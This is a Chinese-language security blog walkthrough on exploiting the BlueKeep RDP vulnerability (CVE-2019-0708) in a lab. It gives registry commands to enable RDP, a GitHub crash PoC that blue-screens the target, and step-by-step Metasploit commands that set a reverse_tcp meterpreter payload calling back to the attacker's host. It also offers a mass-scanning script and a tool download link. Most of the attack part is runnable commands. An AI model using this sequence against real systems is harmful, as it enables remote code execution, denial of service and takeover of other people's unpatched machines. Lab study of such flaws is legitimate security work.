前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-0708漏洞检测利用

CVE-2019-0708漏洞检测利用

作者头像
Gamma实验室
发布2020-12-23 10:12:21
1.4K0
发布2020-12-23 10:12:21
举报
文章被收录于专栏:Gamma安全实验室

01 漏洞详情

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7

危害请见下文

02 工具分享

链接:https://pan.baidu.com/s/1NeaYWuIFoRs0xCHW4S_ntw

提取码:n3zm

环境

攻击机:kali IP: 10.1.8.167

靶机: win7 IP:10.1.8.8(开放3389端口)

Win7靶机开启和关闭3389端口

(1)开启3389端口:

在cmd内,执行如下命令,即可开启3389端口。

代码语言:javascript
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(2)关闭3389端口:

在cmd内,执行如下命令,即可关闭3389端口。

代码语言:javascript
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

03 蓝屏

使用nmap对靶机进行扫描:

使用漏洞POC进行测试:

POChttps://github.com/n1xbyte/CVE-2019-0708

用法:python3 crashpoc.py ip地址 系统类型

代码语言:javascript
复制
git clone https://github.com/n1xbyte/CVE-2019-0708.git
python3 crashpoc.py 10.1.8.8  64

靶机已蓝屏:

04 反弹shell

https://github.com/biggerwing/CVE-2019-0708-poc

.配置msf,将exp放置到msf对应文件夹下,如果同名直接覆盖(这里以kali为例)

将相应的EXP放到kaili里面相应的位置,若是相同文件名就替换,若是不存在的文件就创建。

代码语言:javascript
复制
rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd
rdp_scanner.rb->/usr/share/Metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb->/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb->/usr/share/Metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

然后在命令行下执行:

代码语言:javascript
复制
root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 10.1.8.8
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >show targets
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set LHOST 10.1.8.167  
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set LPORT 1234
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

注意事项

Target要选对;

如果没有反弹回来可以尝试换一下监听反弹的端口。

05 批量检测

这里参考的是https://github.com/biggerwing/CVE-2019-0708-poc,为了方便,我在原来基础上加了个将成功的结果保存在单独文件的功能。

Windows python3环境

用法:

1. 编辑3389_hosts,将待检测的IP地址写入文件,一行一个

2. 命令行切换到代码所在的目录,运行python3 cve-2019-0708.py

END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-11-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gamma安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档